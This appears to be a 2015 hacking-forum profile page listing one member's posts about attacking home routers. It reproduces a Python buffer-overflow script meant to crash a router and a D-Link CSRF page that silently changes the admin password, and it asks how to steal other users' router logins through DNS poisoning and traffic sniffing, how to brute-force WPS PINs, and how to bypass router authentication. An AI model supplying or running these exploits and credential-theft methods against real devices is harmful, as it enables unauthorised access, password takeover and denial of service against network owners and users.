Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - FurqanHanif

Pages: [1] 2
1
Hacking and Security / UPNP Exploit ?? Gain Root Access of Router ..
« on: December 02, 2015, 08:15:32 am »
Is they ever Released this Tool which Exploit UPNP and you get Root Access of Router (0day exploit) ?? is Metasploit Include this Module ??
What Modules can be used To gain Root Access of Router via Exploiting UPNP Service?? (Via Metasploit)
www.youtube.com/watch?v=cv-MbL7KFKE

Anyone Knows about it ??

Any Help Please??
Reply With Quote

2
General discussion / Re: Somone Help me To fix the Below CODE
« on: May 03, 2015, 09:53:18 pm »
Now Error in Line 15... :(

Quote
File "buffer.py", line 15
    payload += ("Host: %s \r\n\r\n", % host)
                                     ^
SyntaxError: invalid syntax

3
General discussion / Somone Help me To fix the Below CODE
« on: May 03, 2015, 09:39:53 pm »
i am Trying To run This Exploit but i 'm getting Syntax error when i Run it, some one help me to fix this Code..
i am Getting syntax Error on line 14 ...  :(

Code: (python) [Select]
#!/bin/python
import socket
import struct
 
# This will crash the router.
# In some devices it takes about 10 minutes until functionality is restored.
 
buffer = "\x41" * 6000            # Original fuzzing buffer.
host = "192.168.15.25"
 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 80))
 
payload = GET /" + buffer + " HTTP / 1.1 \r\n "
payload += ("Host: %s \r\n\r\n", % host)
 
s.send(payload)
s.close()

Original Post.
https://www.exploit-db.com/exploits/34102/

4
Hacking and Security / Re: HTTP 1.1 / Basic Authentication Bypass?? Possible??
« on: May 03, 2015, 08:35:19 pm »
Quote from: Cicada 3301 on May 03, 2015, 07:56:24 pm
Try attacking the 8-digit pin in the router. You can do this by using Reaver, it takes about ~ 4 - 10 hours.


This only works if WPS is not locked. You can see if it is open or not using wash (wash -i <monitor interface>)
I am Talking About Login , Not Wifi Hacking...  ???

5
Hacking and Security / Re: HTTP 1.1 / Basic Authentication Bypass?? Possible??
« on: May 03, 2015, 08:34:10 pm »
Quote from: DeepCopy on May 03, 2015, 06:05:10 pm
Bruteforce
Bruteforce Not Gonna work if password is #kjkjhuijko88287098JbJh#$%%# and you Know it ..
So ......

6
Hacking and Security / HTTP 1.1 / Basic Authentication Bypass?? Possible??
« on: May 03, 2015, 05:48:39 pm »
i Have A router , Model i Think 2009 or 10 , using micro_httpd  so  is  it's authentication can be bypass , is it possible to retrieve the password in hash and then crack it or simply bypass it's authentication ??? 
i Know About Xhydra and i also used it , so please don't tell me about using such kind of password cracking software...
Thanks in advance ...

this is the full detail of my Router..

7
Hacking and Security / D-Link DSL CSRF Exploit . How to Use/Test ??
« on: May 02, 2015, 11:20:53 pm »
Someone Tell me How i Use this Exploit To test my Router . Their is Only Just HTML code is Given , someone explain this too me how i use this code exactly to change the password... ???

Quote
+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : D-Link DSL-2640B (ADSL Router) CSRF Vulnerability
# Date          : 19-02-2012
# Author        : Ivano Binetti (http://ivanobinetti.com)
# Vendor site   : http://www.d-link.com
# Version       : DSL-2640B
# Tested on     : Firmware Version: EU_4.00; Hardware Version: B2
+--------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------[Change Admin Account Password by Ivano Binetti]--------------------------------------------------+
Summary
 
1)Introduction
2)Vulnerability Description
3)Exploit
 
+---------------------------------------------------------------------------------------------------------------------------------+
 
 
1)Introduction
 
D-Link DSL-2640B is an ADSL Router using (also) a web management interface.
 
 
2)Vulnerability Description
 
The D-Link DSL-2640B's web interface (listening on tcp/ip port 80) is prone to CSRF vulnerabilities which allows to change router
parameters and -among other things- to change default administrator("admin") password.
 
3)Exploit
 
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change ADMIN password</H2>
<form method="POST" name="form0" action="http://192.168.1.1:80/redpass.cgi?sysPassword=new_password&change=1">
</form>
</body>
</html>
 


https://www.exploit-db.com/exploits/18499/


8
Hacking and Security / Re: Question about MITM Attack.
« on: April 19, 2015, 04:12:01 pm »
Still Unexplained , How i Implement The above example in Real World?? i Don't Think only Learning ARP Spoofing Solve This.  :-\ And of course i 'm gonna Use Already made Tools , so no need for Python Explaination. :)

9
Hacking and Security / Re: Question about MITM Attack.
« on: April 19, 2015, 01:38:25 pm »
Thanks for Your Reply But I don't Have an Android For real ...   :(
And Please Read My Post Carefully ...  :)

10
Hacking and Security / Question about MITM Attack.
« on: April 19, 2015, 11:13:27 am »
i have a question about MITM attack (or Whatever This attack is Called).
Let's say i am connected to a Router and three more users are connected to it, router address is 192.168.0.1. Now i don't know the Login Credentials of the Router , so i use Ettercap and Some DNS poisoning etc Stuff and i do attack on an User "A" , now whenever User "A" type www.google.com it auto redirects to original Router Page whose address is 192.168.0.1 , now User type it's Login User and Pass (Because Router Page Not Using HTTPS so it's easy to Read data in PlainText) , now  i am using Wireshark to read all Trafic and Filter all Requests related to 192.168.0.1 and i get the user name and Pass.
So is this Possible ?? if yes Then How i do it ?? if NO then Why ??
Thanks in advance..  :)

11
Hacking and Security / Re: New Pixie Dust Attack/Exploit (WPS Enabled Routers)
« on: April 03, 2015, 01:02:32 pm »
Pixie WPS attack Tool Is out ...  ;D Must Check ...
https://github.com/wiire/pixiewps
https://forums.kali.org/showthread.php?25018-Pixiewps-wps-pixie-dust-attack-tool

12
Hacking and Security / Re: New Pixie Dust Attack/Exploit (WPS Enabled Routers)
« on: March 19, 2015, 08:48:36 pm »
Well it Looks Like Pixie Dust attack Really exists...
An person posted POC(proof of concept) on kali forum in Which he Successfully Recovered the correct WPS PIN via Offline Brute Forcing PIN .........
(For more info Visit)
https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)/page4&highlight=pixie+dust+attack

13
Hacking and Security / New Pixie Dust Attack/Exploit (WPS Enabled Routers)
« on: March 19, 2015, 02:03:09 pm »
Any one hears about this Pixie Dust attack/exploit?? is their any tool available yet to do this attack ?? if not then any one knows how to do it, i think it has Something to do with M3 , Es1 , ES 2 , hash Decrypt and then Brute force the WPS pin. So how to Decrypt and Brute Force Pin Exactly ..??  :o (Please Post if Someone Knows anyThing (Tool etc) Regarding this Attack.. :)

http://www.slideshare.net/0xcite/offline-bruteforce-attack-on-wifi-protected-setup

14
Hacking and Security / Re: Rogue AP and Hacking and Android Device to Read files.
« on: February 20, 2015, 08:23:41 pm »
Hmm Ri8 , i 'll Check.

15
Hacking and Security / Re: Rogue AP and Hacking and Android Device to Read files.
« on: February 19, 2015, 06:48:25 am »
But on some other post , it says that it's Possible. (Same question is askd by some other person).  ???
See the last Comments in the Post..
http://null-byte.wonderhowto.com/how-to/hack-wi-fi-creating-evil-twin-wireless-access-point-eavesdrop-data-0147919/

Pages: [1] 2